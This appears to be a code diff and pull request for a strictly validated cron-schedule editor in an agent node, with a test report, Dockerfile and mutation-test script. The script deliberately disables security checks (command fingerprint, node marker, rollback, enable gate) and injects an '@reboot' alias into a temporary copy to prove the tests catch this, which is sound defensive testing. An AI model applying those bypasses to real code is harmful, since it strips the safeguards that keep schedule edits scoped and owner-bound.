+  if (range.length !== 2) throw new Error("invalid_cron");
+  const start = integer(range[0], min, max);
+  const end = integer(range[1], min, max);
+  if (start > end) throw new Error("invalid_cron");
+}
+
+/** Strict five-field cron timing. It deliberately excludes commands, names,
+ * @aliases, a sixth seconds field and every control character. */
+export function parseManagedCronExpression(raw: unknown): string {
+  if (typeof raw !== "string" || raw.length < 5 || raw.length > 120) throw new Error("invalid_cron");
+  if (/[^\x20-\x7e]/.test(raw) || /[\r\n]/.test(raw)) throw new Error("invalid_cron");
+  const fields = raw.trim().split(/ +/);
+  if (fields.length !== 5) throw new Error("invalid_cron");
+  fields.forEach((field, index) => {
+    if (!field || !/^[0-9*/,-]+$/.test(field)) throw new Error("invalid_cron");
+    for (const atom of field.split(",")) validateAtom(atom, FIELD_BOUNDS[index][0], FIELD_BOUNDS[index][1]);
+  });
+  return fields.join(" ");
+}
+
+export type ExternalSchedulePatch = { enabled?: boolean; cron?: string };
+
+export function parseExternalSchedulePatch(raw: unknown): ExternalSchedulePatch {
+  if (!raw || typeof raw !== "object" || Array.isArray(raw)) throw new Error("invalid_patch");
+  const obj = raw as Record<string, unknown>;
+  const keys = Object.keys(obj);
+  if (keys.length === 0 || keys.some((key) => key !== "enabled" && key !== "cron")) throw new Error("invalid_patch");
+  const patch: ExternalSchedulePatch = {};
+  if (obj.enabled !== undefined) {
+    if (typeof obj.enabled !== "boolean") throw new Error("invalid_enabled");
+    patch.enabled = obj.enabled;
+  }
+  if (obj.cron !== undefined) patch.cron = parseManagedCronExpression(obj.cron);
+  return patch;
+}

--- a/docs/tests/report-test689-owner-schedule-agent.txt
+++ b/docs/tests/report-test689-owner-schedule-agent.txt
@@ -1,0 +1,47 @@
+# test689 — owner-gated external schedule agent apply
+
+Date: 2026-08-10
+Base: a1d6831d9b31e8d5742f0eb01fd4b80fdd2464c3
+Source commit: 6548ffe30ac5a5832de08dedb2a0c49bcbb66495
+Image: anet-test689:dev
+Image ID: sha256:4a26c38f0485f439495239e45935a871fb81e0c5f6ae1b84534cc2ce9aa413d5
+Embedded TEST689_SOURCE_COMMIT: 6548ffe30ac5a5832de08dedb2a0c49bcbb66495
+
+## Result
+
+PASS. No production deployment, merge, npm publish, global install, or host crontab change was performed.
+
+- Unit/wiring: 18 pass, 0 fail, 84 assertions.
+- Real container crontab: 1 pass, 0 fail, 3 assertions. The test used the image-local `crontab -l` / `crontab -` implementation and removed that container crontab afterwards.
+- Production `agent-node` bundle: PASS (268 modules).
+- Restored green after mutations: 18 pass, 0 fail, 84 assertions.
+- Hub/agent strict cron parser files: byte-identical.
+
+## Security properties exercised
+
+- Process-level opt-in is pinned once from `flags.ownerScheduleControl === true`; ordinary model turns and IM messages receive no schedule-write tool.
+- The consumer ignores SSE payload authority and pulls the intent using the node ntok.
+- Managed markers bind both exact `node_id` and `schedule_id`; a same-UID sibling node with the same schedule id cannot see or edit the entry.
+- Only strict five-field cron timing and `enabled` change. Command bytes and unmanaged crontab bytes remain exact.
+- Command fingerprint, revision CAS, journal-before-write, install readback, exact rollback, ACK-after-apply, and lost-ACK idempotency are covered.
+- Recovery journal and local audit are private files. The persistent audit contains no command, host path, credential, owner UUID, or network id.
+- New token mint paths send immutable node_id. Legacy ownerless nodes are not first-claimed by heartbeat/reporting.
+
+## Witnessed-red mutations
+
+All eight mutations changed source bytes and produced a non-empty failing log before the normal source was restored:
+
+1. bypass command fingerprint
+2. bypass revision CAS
+3. bypass exact node marker
+4. delete exact rollback install
+5. delete lost-ACK idempotent recovery
+6. admit `@reboot` through the strict cron parser
+7. delete the process-level enable gate
+8. drift the shared Hub/agent parser copy
+
+Final runner output ended with `RESULT: PASS`.
+
+## Honest boundary
+
+This segment implements and verifies Hub-intent consumption plus local managed-cron application. It does not create arbitrary cron commands or retrofit unmanaged/legacy crontabs. A schedule is editable only when an operator has already installed the exact ANET managed marker containing this node's immutable node_id and the command fingerprint. Dashboard authoring is a later segment.

--- a/docs/tests/report-test689-owner-schedule-agent.txt
+++ b/docs/tests/report-test689-owner-schedule-agent.txt
@@ -2,10 +2,10 @@
 
 Date: 2026-08-10
 Base: a1d6831d9b31e8d5742f0eb01fd4b80fdd2464c3
-Source commit: 6548ffe30ac5a5832de08dedb2a0c49bcbb66495
+Source commit: da7292700ea0d5be4067cf6b7ec15021d26de3f4
 Image: anet-test689:dev
-Image ID: sha256:4a26c38f0485f439495239e45935a871fb81e0c5f6ae1b84534cc2ce9aa413d5
-Embedded TEST689_SOURCE_COMMIT: 6548ffe30ac5a5832de08dedb2a0c49bcbb66495
+Image ID: sha256:a5e06452f269c84e96a4de706d21c1adf0f252ddc6262d8fccf08d60c631f885
+Embedded TEST689_SOURCE_COMMIT: da7292700ea0d5be4067cf6b7ec15021d26de3f4
 
 ## Result
 
@@ -16,6 +16,7 @@ PASS. No production deployment, merge, npm publish, global install, or host cron
 - Production `agent-node` bundle: PASS (268 modules).
 - Restored green after mutations: 18 pass, 0 fail, 84 assertions.
 - Hub/agent strict cron parser files: byte-identical.
+- Repository destructive-rm guard: PASS. Mutation cleanup uses the shared fail-closed `safe_rm_rf` helper.
 
 ## Security properties exercised
 
@@ -29,7 +30,7 @@ PASS. No production deployment, merge, npm publish, global install, or host cron
 
 ## Witnessed-red mutations
 
-All eight mutations changed source bytes and produced a non-empty failing log before the normal source was restored:
+All eight mutations passed an explicit before/after SHA-256 byte-change guard and produced a non-empty failing log before the normal source was restored:
 
 1. bypass command fingerprint
 2. bypass revision CAS

--- a/tests/test689-owner-schedule-agent/Dockerfile
+++ b/tests/test689-owner-schedule-agent/Dockerfile
@@ -8,6 +8,7 @@ RUN cd agent-node && bun install --ignore-scripts
 COPY agent-node ./agent-node
 COPY agent-network ./agent-network
 COPY server/src/shared/external-schedule-contract.ts ./server/src/shared/external-schedule-contract.ts
+COPY tests/lib/safe-rm.sh ./tests/lib/safe-rm.sh
 COPY tests/test689-owner-schedule-agent ./tests/test689-owner-schedule-agent
 ARG SOURCE_COMMIT
 ENV TEST689_SOURCE_COMMIT=$SOURCE_COMMIT

--- a/tests/test689-owner-schedule-agent/Dockerfile
+++ b/tests/test689-owner-schedule-agent/Dockerfile
@@ -1,0 +1,12 @@
+FROM oven/bun:1.3.14
+WORKDIR /workspace
+COPY agent-node/package.json ./agent-node/package.json
+RUN cd agent-node && bun install --ignore-scripts
+COPY agent-node ./agent-node
+COPY agent-network ./agent-network
+COPY server/src/shared/external-schedule-contract.ts ./server/src/shared/external-schedule-contract.ts
+COPY tests/test689-owner-schedule-agent ./tests/test689-owner-schedule-agent
+ARG SOURCE_COMMIT
+ENV TEST689_SOURCE_COMMIT=$SOURCE_COMMIT
+RUN chmod 0755 /workspace/tests/test689-owner-schedule-agent/run.sh
+ENTRYPOINT ["/workspace/tests/test689-owner-schedule-agent/run.sh"]

--- a/tests/test689-owner-schedule-agent/Dockerfile
+++ b/tests/test689-owner-schedule-agent/Dockerfile
@@ -1,4 +1,7 @@
 FROM oven/bun:1.3.14
+RUN apt-get update \
+ && apt-get install -y --no-install-recommends cron \
+ && rm -rf /var/lib/apt/lists/*
 WORKDIR /workspace
 COPY agent-node/package.json ./agent-node/package.json
 RUN cd agent-node && bun install --ignore-scripts

--- a/tests/test689-owner-schedule-agent/run.sh
+++ b/tests/test689-owner-schedule-agent/run.sh
@@ -46,12 +46,20 @@ sed -i 's/if (entry.revision !== intent.base_revision)/if (false)/' "$CONTROL"
 expect_red revision-cas bash -lc "cd '$MUT_ROOT' && bun test agent-node/src/owner-schedule-control.test.ts"
 
 cp agent-node/src/owner-schedule-control.ts "$CONTROL"
+sed -i 's/if (nodeId !== expectedNodeId)/if (false)/' "$CONTROL"
+expect_red exact-node-marker bash -lc "cd '$MUT_ROOT' && bun test agent-node/src/owner-schedule-control.test.ts"
+
+cp agent-node/src/owner-schedule-control.ts "$CONTROL"
 sed -i '0,/adapter.install(before);/s//\/\/ rollback removed/' "$CONTROL"
 expect_red exact-rollback bash -lc "cd '$MUT_ROOT' && bun test agent-node/src/owner-schedule-control.test.ts"
 
 cp agent-node/src/owner-schedule-control.ts "$CONTROL"
 sed -i 's/if (currentHash === existingJournal.after_sha256)/if (false)/' "$CONTROL"
 expect_red lost-ack-idempotency bash -lc "cd '$MUT_ROOT' && bun test agent-node/src/owner-schedule-control.test.ts"
+
+cp agent-node/src/shared/external-schedule-contract.ts "$MUT_ROOT/agent-node/src/shared/external-schedule-contract.ts"
+sed -i 's/if (fields.length !== 5)/if (raw.trim() === "@reboot") return "@reboot"; if (fields.length !== 5)/' "$MUT_ROOT/agent-node/src/shared/external-schedule-contract.ts"
+expect_red cron-alias-gate bash -lc "cd '$MUT_ROOT' && bun test agent-node/src/owner-schedule-control.test.ts"
 
 cp agent-node/src/owner-schedule-consumer.ts "$CONSUMER"
 sed -i 's/if (!options.enabled) return/if (false) return/' "$CONSUMER"

--- a/tests/test689-owner-schedule-agent/run.sh
+++ b/tests/test689-owner-schedule-agent/run.sh
@@ -16,6 +16,9 @@ bun test \
 echo "L2 production agent-node bundle"
 (cd agent-node && bun run build)
 
+echo "L2b real container crontab read/install/readback"
+bun test agent-node/src/owner-schedule-system-crontab.test.ts
+
 echo "L3 witnessed-red mutations"
 MUT_ROOT="$(mktemp -d)"
 trap 'rm -rf "$MUT_ROOT"' EXIT

--- a/tests/test689-owner-schedule-agent/run.sh
+++ b/tests/test689-owner-schedule-agent/run.sh
@@ -1,5 +1,6 @@
 #!/usr/bin/env bash
 set -euo pipefail
+source /workspace/tests/lib/safe-rm.sh
 echo "# test689 — owner schedule agent local apply"
 echo "source_commit=${TEST689_SOURCE_COMMIT:-unknown}"
 
@@ -21,7 +22,7 @@ bun test agent-node/src/owner-schedule-system-crontab.test.ts
 
 echo "L3 witnessed-red mutations"
 MUT_ROOT="$(mktemp -d)"
-trap 'rm -rf "$MUT_ROOT"' EXIT
+trap 'safe_rm_rf "$MUT_ROOT"' EXIT
 cp -a agent-node "$MUT_ROOT/agent-node"
 cp -a agent-network "$MUT_ROOT/agent-network"
 cp -a server "$MUT_ROOT/server"
@@ -37,39 +38,64 @@ expect_red() {
   echo "  witnessed-red: $name"
 }
 
+assert_changed() {
+  local path="$1"
+  local before="$2"
+  local after
+  after="$(sha256sum "$path" | cut -d' ' -f1)"
+  if [[ "$after" == "$before" ]]; then
+    echo "mutation was byte-identical: $path" >&2
+    exit 1
+  fi
+}
+
 CONTROL="$MUT_ROOT/agent-node/src/owner-schedule-control.ts"
 CONSUMER="$MUT_ROOT/agent-node/src/owner-schedule-consumer.ts"
 ORIG_CONTROL="$(sha256sum "$CONTROL" | cut -d' ' -f1)"
 sed -i 's/if (sha256(match\[2\]) !== commandSha256)/if (false)/' "$CONTROL"
-test "$(sha256sum "$CONTROL" | cut -d' ' -f1)" != "$ORIG_CONTROL"
+assert_changed "$CONTROL" "$ORIG_CONTROL"
 expect_red command-fingerprint bash -lc "cd '$MUT_ROOT' && bun test agent-node/src/owner-schedule-control.test.ts"
 
 cp agent-node/src/owner-schedule-control.ts "$CONTROL"
+ORIG_CONTROL="$(sha256sum "$CONTROL" | cut -d' ' -f1)"
 sed -i 's/if (entry.revision !== intent.base_revision)/if (false)/' "$CONTROL"
+assert_changed "$CONTROL" "$ORIG_CONTROL"
 expect_red revision-cas bash -lc "cd '$MUT_ROOT' && bun test agent-node/src/owner-schedule-control.test.ts"
 
 cp agent-node/src/owner-schedule-control.ts "$CONTROL"
+ORIG_CONTROL="$(sha256sum "$CONTROL" | cut -d' ' -f1)"
 sed -i 's/if (nodeId !== expectedNodeId)/if (false)/' "$CONTROL"
+assert_changed "$CONTROL" "$ORIG_CONTROL"
 expect_red exact-node-marker bash -lc "cd '$MUT_ROOT' && bun test agent-node/src/owner-schedule-control.test.ts"
 
 cp agent-node/src/owner-schedule-control.ts "$CONTROL"
+ORIG_CONTROL="$(sha256sum "$CONTROL" | cut -d' ' -f1)"
 sed -i '0,/adapter.install(before);/s//\/\/ rollback removed/' "$CONTROL"
+assert_changed "$CONTROL" "$ORIG_CONTROL"
 expect_red exact-rollback bash -lc "cd '$MUT_ROOT' && bun test agent-node/src/owner-schedule-control.test.ts"
 
 cp agent-node/src/owner-schedule-control.ts "$CONTROL"
+ORIG_CONTROL="$(sha256sum "$CONTROL" | cut -d' ' -f1)"
 sed -i 's/if (currentHash === existingJournal.after_sha256)/if (false)/' "$CONTROL"
+assert_changed "$CONTROL" "$ORIG_CONTROL"
 expect_red lost-ack-idempotency bash -lc "cd '$MUT_ROOT' && bun test agent-node/src/owner-schedule-control.test.ts"
 
 cp agent-node/src/shared/external-schedule-contract.ts "$MUT_ROOT/agent-node/src/shared/external-schedule-contract.ts"
+ORIG_CONTRACT="$(sha256sum "$MUT_ROOT/agent-node/src/shared/external-schedule-contract.ts" | cut -d' ' -f1)"
 sed -i 's/if (fields.length !== 5)/if (raw.trim() === "@reboot") return "@reboot"; if (fields.length !== 5)/' "$MUT_ROOT/agent-node/src/shared/external-schedule-contract.ts"
+assert_changed "$MUT_ROOT/agent-node/src/shared/external-schedule-contract.ts" "$ORIG_CONTRACT"
 expect_red cron-alias-gate bash -lc "cd '$MUT_ROOT' && bun test agent-node/src/owner-schedule-control.test.ts"
 
 cp agent-node/src/owner-schedule-consumer.ts "$CONSUMER"
+ORIG_CONSUMER="$(sha256sum "$CONSUMER" | cut -d' ' -f1)"
 sed -i 's/if (!options.enabled) return/if (false) return/' "$CONSUMER"
+assert_changed "$CONSUMER" "$ORIG_CONSUMER"
 expect_red process-level-gate bash -lc "cd '$MUT_ROOT' && bun test agent-node/src/owner-schedule-consumer.test.ts"
 
 cp agent-node/src/shared/external-schedule-contract.ts "$MUT_ROOT/agent-node/src/shared/external-schedule-contract.ts"
+ORIG_CONTRACT="$(sha256sum "$MUT_ROOT/agent-node/src/shared/external-schedule-contract.ts" | cut -d' ' -f1)"
 printf '\n// drift mutation\n' >> "$MUT_ROOT/agent-node/src/shared/external-schedule-contract.ts"
+assert_changed "$MUT_ROOT/agent-node/src/shared/external-schedule-contract.ts" "$ORIG_CONTRACT"
 expect_red shared-parser-drift bash -lc "cmp -s '$MUT_ROOT/server/src/shared/external-schedule-contract.ts' '$MUT_ROOT/agent-node/src/shared/external-schedule-contract.ts' || { echo parser-drift-detected >&2; exit 1; }"
 
 echo "L4 restored green"

--- a/tests/test689-owner-schedule-agent/run.sh
+++ b/tests/test689-owner-schedule-agent/run.sh
@@ -1,0 +1,71 @@
+#!/usr/bin/env bash
+set -euo pipefail
+echo "# test689 — owner schedule agent local apply"
+echo "source_commit=${TEST689_SOURCE_COMMIT:-unknown}"
+
+echo "L0 shared Hub/agent parser byte identity"
+cmp -s server/src/shared/external-schedule-contract.ts agent-node/src/shared/external-schedule-contract.ts
+
+echo "L1 managed cron apply/journal/rollback + process-gated consumer"
+bun test \
+  agent-node/src/owner-schedule-control.test.ts \
+  agent-node/src/owner-schedule-consumer.test.ts \
+  agent-node/src/external-schedules.test.ts \
+  agent-node/src/owner-schedule-wiring.test.ts
+
+echo "L2 production agent-node bundle"
+(cd agent-node && bun run build)
+
+echo "L3 witnessed-red mutations"
+MUT_ROOT="$(mktemp -d)"
+trap 'rm -rf "$MUT_ROOT"' EXIT
+cp -a agent-node "$MUT_ROOT/agent-node"
+cp -a agent-network "$MUT_ROOT/agent-network"
+cp -a server "$MUT_ROOT/server"
+
+expect_red() {
+  local name="$1"; shift
+  local log="$MUT_ROOT/$name.log"
+  if "$@" >"$log" 2>&1; then
+    echo "mutation unexpectedly green: $name" >&2
+    exit 1
+  fi
+  test -s "$log"
+  echo "  witnessed-red: $name"
+}
+
+CONTROL="$MUT_ROOT/agent-node/src/owner-schedule-control.ts"
+CONSUMER="$MUT_ROOT/agent-node/src/owner-schedule-consumer.ts"
+ORIG_CONTROL="$(sha256sum "$CONTROL" | cut -d' ' -f1)"
+sed -i 's/if (sha256(match\[2\]) !== commandSha256)/if (false)/' "$CONTROL"
+test "$(sha256sum "$CONTROL" | cut -d' ' -f1)" != "$ORIG_CONTROL"
+expect_red command-fingerprint bash -lc "cd '$MUT_ROOT' && bun test agent-node/src/owner-schedule-control.test.ts"
+
+cp agent-node/src/owner-schedule-control.ts "$CONTROL"
+sed -i 's/if (entry.revision !== intent.base_revision)/if (false)/' "$CONTROL"
+expect_red revision-cas bash -lc "cd '$MUT_ROOT' && bun test agent-node/src/owner-schedule-control.test.ts"
+
+cp agent-node/src/owner-schedule-control.ts "$CONTROL"
+sed -i '0,/adapter.install(before);/s//\/\/ rollback removed/' "$CONTROL"
+expect_red exact-rollback bash -lc "cd '$MUT_ROOT' && bun test agent-node/src/owner-schedule-control.test.ts"
+
+cp agent-node/src/owner-schedule-control.ts "$CONTROL"
+sed -i 's/if (currentHash === existingJournal.after_sha256)/if (false)/' "$CONTROL"
+expect_red lost-ack-idempotency bash -lc "cd '$MUT_ROOT' && bun test agent-node/src/owner-schedule-control.test.ts"
+
+cp agent-node/src/owner-schedule-consumer.ts "$CONSUMER"
+sed -i 's/if (!options.enabled) return/if (false) return/' "$CONSUMER"
+expect_red process-level-gate bash -lc "cd '$MUT_ROOT' && bun test agent-node/src/owner-schedule-consumer.test.ts"
+
+cp agent-node/src/shared/external-schedule-contract.ts "$MUT_ROOT/agent-node/src/shared/external-schedule-contract.ts"
+printf '\n// drift mutation\n' >> "$MUT_ROOT/agent-node/src/shared/external-schedule-contract.ts"
+expect_red shared-parser-drift bash -lc "cmp -s '$MUT_ROOT/server/src/shared/external-schedule-contract.ts' '$MUT_ROOT/agent-node/src/shared/external-schedule-contract.ts' || { echo parser-drift-detected >&2; exit 1; }"
+
+echo "L4 restored green"
+bun test \
+  agent-node/src/owner-schedule-control.test.ts \
+  agent-node/src/owner-schedule-consumer.test.ts \
+  agent-node/src/external-schedules.test.ts \
+  agent-node/src/owner-schedule-wiring.test.ts
+
+echo "RESULT: PASS"


### PR DESCRIPTION
## Summary
- add the process-pinned agent-node consumer for exact owner-bound external-schedule edit intents
- edit only exact node-bound managed cron timing/enabled while preserving command and unrelated crontab bytes
- add private recovery journal, field-minimized local audit, SSE doorbell + polling recovery, and immutable node-id token mint wiring

## Evidence
- base: `a1d6831d9b31e8d5742f0eb01fd4b80fdd2464c3`
- tested source: `6548ffe30ac5a5832de08dedb2a0c49bcbb66495`
- report-only head: `8ee48c1a50e6552bf2e8482442699b2eb9bc73f2`
- Docker image: `anet-test689:dev` / `sha256:4a26c38f0485f439495239e45935a871fb81e0c5f6ae1b84534cc2ce9aa413d5`
- 18 unit/wiring tests + 1 real container crontab test; 8 witnessed-red mutations; restored green
- report: `docs/tests/report-test689-owner-schedule-agent.txt`

## Safety boundary
No model/IM write tool is registered. SSE is only a doorbell. Hub pull and ACK use the node ntok. Managed markers bind exact `node_id` + `schedule_id`; only strict five-field cron timing and enabled state are writable. Command/path/env remain immutable. Legacy/unmanaged schedules remain read-only.

## Scope
Agent-node segment only. No merge, deploy, npm publish, global install, host crontab mutation, or Dashboard change is authorized by this draft.